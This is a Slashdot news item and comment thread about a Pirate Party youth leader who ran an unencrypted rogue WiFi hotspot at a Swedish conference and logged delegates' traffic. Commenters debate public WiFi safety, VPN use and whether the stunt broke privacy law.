Simple Rogue WiFi Hotspot Captures High Profile Data 67
jones_supa writes Gustav Nipe, president of Sweden's Pirate Party's youth wing, was successful with somewhat trivial social engineering experiment in the area of the Sälen security conference. He set up a WiFi hotspot named "Öppen Gäst" ("Open Guest") without any kind of encryption. What do you know, a large amount of unsuspecting high profile guests associate with the network. Nipe says he was able to track which sites people visited as well as the emails and text messages of around 100 delegates, including politicians and journalists as well as security experts. He says that he won't be revealing which sites were visited by specific experts, as the point was just to draw attention to the issue of rogue network monitoring. The stunt has already sparked criticism in Swedish newspapers and on social media, with some angry comments saying that Nipe breached Sweden's Personal Data Act.
You want to protect your data? (Score:5, Insightful)
If you want to protect your data, don't connect to an open WiFi hotspot.
Also, shame on the so-called "security experts" who used it.
Re: (Score:1)
What's wrong with that? Whenever I use an open hotspot, I *assume* the worst... if I can ssh to https into whatever, so what?
If I don't care about stuff, (e.g. reading cnn.com, for example), then who cares if it's encrypted or not?
Stunts like this scare people into not using/providing open internet access... I'd rather we have *more* open wifis (monitor whatever you want out of them), just have them be all over whenever I need them.
Re:You want to protect your data? (Score:5, Insightful)
Are you 100% certain the cnn.com you think you asked for a page is actually cnn.com and not some i'm-gonna-fill-your-browser-full-of-malware spoof?
Re:You want to protect your data? (Score:5, Funny)
can't be any worse than the reall cnn.com
Re:You want to protect your data? (Score:5, Insightful)
Agree with this AC.
What I'm more concerned about and don't know the answer to are the Smart Phone apps which may check for their own "updates" while I'm on a sinister wifi hotspot. Will a "Bank of App" program open an auto update query in the background, and disclose any details I don't intend it to? I never "save passwords" and rarely enter them in unknown wireless environments.
The Swedish guy probably did a public service, but the alarms seem aimed at people who don't know the risks. "Never use wifi, and never read CNN online" hyperbole just fatigues people and causes people to treat it as an acceptable risk rather than something they can cope with through caution. The "what if its a fake CNN site" question is a totally separate problem which could occur on a verified hotspot, or wired account... And so what if it's a fake CNN site? They get my lowest concern throwaway password, as I have no money at CNN. I too always am careful which sites I go to on public wifi hotspots.
Re: (Score:2)
The apps themselves, though, seem to be amazingl
Re: (Score:2)
Re:You want to protect your data? (Score:4, Informative)
What's wrong with that? Whenever I use an open hotspot, I *assume* the worst... if I can ssh to https into whatever, so what?
If I don't care about stuff, (e.g. reading cnn.com, for example), then who cares if it's encrypted or not?
Stunts like this scare people into not using/providing open internet access... I'd rather we have *more* open wifis (monitor whatever you want out of them), just have them be all over whenever I need them.
I largely agree with you, open hotspots are excessively demonized(both 'if you touch one you'll get cyber-syphilis!' and 'if you operate one pedophiles will smell it from miles away and you'll go to jail forever!'); but they can be dangerous, and people frequently don't take enough precautions.
Awareness of VPNs is actually pretty high, all things considered; but mostly for the purposes of getting Netflix in foreignistan, or getting to facebook at school/work. This tends to mean that even people who know about, and use, them typically don't ensure that all chatter from their computer(unless you are very careful, that's often a lot, from all sorts of updaters, autodiscovery agents, and annoying background processes) goes over the VPN, since their use of VPNs is all about ensuring that a specific, normally blocked, bit of traffic makes it out alive, rather than ensuring that no traffic leaks locally.
The area I would argue with you about is 'unimportant' HTTP: Do I care that somebody knows I visited CNN? No. However, if I make an HTTP connection, do I have the slightest assurance that I'm actually visiting CNN, rather than 'CNN, plus some rewrites that add a suite of common browser exploits'? Not so much. That can, and does, happen even on a trusted connection, through sites being hacked or ad network fuckery; but adding another party who can trivially rewrite the site with god-knows-what isn't really something you want.
If you have a proper VPN, with all traffic either heading over it or blocked before it leaves your system, though, all good.
Re: (Score:3)
Re:You want to protect your data? (Score:4, Insightful)
Re: You want to protect your data? (Score:1)
VPN? (Score:3)
Hackers Obey the Law!! (Score:5, Insightful)
with some angry comments saying that Nipe breached Sweden's Personal Data Act
like hackers really care about obeying laws?
Re: (Score:3, Insightful)
Re: (Score:1)
I think a valuable, although statistically useless, point here is that the police didn't catch this guy. He turned himself in. What happens in a real-world version of this attack? What will that law end up doing? Most of the time, not getting someone in front of a judge to be told he deserves no leniency. Most of the time, it will be as if the law doesn't even exist, and there will be plenty of leniency.
Re:Hackers Obey the Law!! (Score:4, Funny)
Worse, did not the delegate commit Theft of Service by using a WLAN they were not authorized to?
Re: (Score:2)
You can't visit a website without it having +10 trackers on it either.
Are they breaching the law too? Or is it just illegal if you don't do it to make money out of it?
Re: (Score:2)
dupe (Score:5, Informative)
http://mobile.slashdot.org/sto... [slashdot.org]
Re: (Score:2)
Maybe the editors are getting Alzheimer's. Twelve hours is a pretty short time for a dupe though.
Re: (Score:2)
I just thought of another reason. Maybe since the original post had lass than 70 comments they may have thought adding the term 'Rogue WiFi' might garner more attention. If it doesn't get enough traffic then sensationalize it.
Re: (Score:2)
nahh if that was the motive, they would throw in something about Obama and Global warming.
Re: (Score:2)
I've never ever EVER even had a HINT of a desire to create a Twitter account... But perhaps it's time I considered it. #NixonNow
Re: (Score:2)
Re: (Score:2, Informative)
I always steal a car before informing people about their lord and savior Jebus Christ.
The Sub-Genii have been doing that for years.
some things for any judge to consider (Score:5, Informative)
An open network connection at a security conference. That's either a honeypot or a freebie. Were it me, I'd assume the latter, but I wouldn't be doing my online banking through it. If I were an attendee, I'd know better.
If he's guilty of providing free internet service then people the world over who open their wifi connections are also guilty. I say, and cue the flaming for this, that data security starts and ends with the owner of the data. Take some fucking responsibility for yourself instead of relying on a Government that doesn't give a fuck about you, to do it for you. If anybody should be prosecuted for leaking data in clear text through an unencrypted radio stream (he was literally the guy on the next bench listening in on a shouted conversation, here!), then it should be the administrators of the websites that were visited for not using properly secured data channels such as SSL, endpoint encryption, tunnelling or whatever.
Re: (Score:1)
Re: (Score:1)
Re:some things for any judge to consider (Score:4, Interesting)
An open network connection at a security conference. That's either a honeypot or a freebie.
This. At the security conference I attend (defcon), assuming you got drunk enough to be dumb enough to connect an open hotspot, you'd be thanking your lucky stars if the worst that happened to you was getting on the wall of sheep (which is essentially the same stunt this guy pulled, with the information projected on a wall for everyone to see). I personally VPN *everything* during that week, and if I have to absolutely connect to a work system, I drive to a random McDs outside of the conference and do my VPNing from there (it's usually faster and more reliable then any network at the conference too, since it's not the prize in a big game of Spy vs Spy).
Min
The set up was so nice (Score:1)
they dupped it twice.
not a ICT security conference (Score:1)
The "Sälen security conference" is a defense security conference,
It is not some IT guys meeting for some cood white/black hat stuff.
They should still be aware of the dangers, but it is perfectly understandable since these people are usually the ones fired up to their incompetence level..
And they don't have a clue of network security. And if you inform them they do not care since they think all should be provided for them.
The danger of open networks (Score:4, Interesting)
At some point ... (Score:3)
... you have to take responsibility for what you are doing.
Yes, I could call up the post office and ask if that new blue mailbox on the street corner that says "post office" is legit. That would be so efficient, societal-ly speaking, huh?
Or we could just throw people in jail who set up fake post boxes.
Re: (Score:2)
Slashdot entry is only half-true (Score:1)
First, it was not a security conference, it was a conference regarding government surveillance. Nipe was Survailing the government representatives who want to Survail citizens more.
The conference was'nt really about security it was about anonymity and personal integrity,
Cap'n Jack Sparrow for President (Score:2)
"...The stunt has already sparked criticism in Swedish newspapers and on social media, with some angry comments saying that Nipe breached Sweden's Personal Data Act."
Uh...maybe the whole country ah...missed something here..
"Gustav Nipe, president of Sweden's Pirate Party's youth wing..."
Uh...yeah..I mean THAT part.
Helllloooo.... Pirate. Remember? Cap'n Jack Sparrow made that concept pretty damn clear I thought. Don't act so surprised.
Oh, and be thankful it was a pirate. Those damn ninjas are sneaky.
I weep for humanity (Score:3)
I keep seeing stuff like this. Someone who is not stupid makes enough rope available, someone who IS stupid hangs themselves with it, and the first guy takes all the blame. We protect the stupid at all costs. The appropriate response to this is "Don't connect to hotspots you're not sure about, and if you do, take appropriate measures (VPN, https, etc)". No, this is too hard for the shitheads out there who keep getting protected from their own stupidity.
What I think the non-stupid people need to do is to stop helping these people. Next time, this guy should just keep quiet about what he did at the conference, and quietly sell the incriminating information he collects. Eventually the stupid people will either get tired of having their identities/all their money stolen, and wise the fuck up, or they won't and will be removed from the useful ranks of society. Either way the situation improves.
I'm not saying I'm smarter than anyone else. I'm saying that if I do something stupid, it's my own damn fault. We don't blame the truck driver when someone plays in traffic. The internet has been part of society in one way or another for over twenty years. It's long enough.
Wifi name (Score:1)
And thus the surveillance crowd is put on notice (Score:1)
Two can play at this game, or more. The NSA wants to watch us? We can also watch *them*. You may not. I may not. But I guarantee you that someone will, and that their names, addresses, phone numbers and movements will some day show up on the equivalent of wikileaks.
Revenge is a dish best served cold.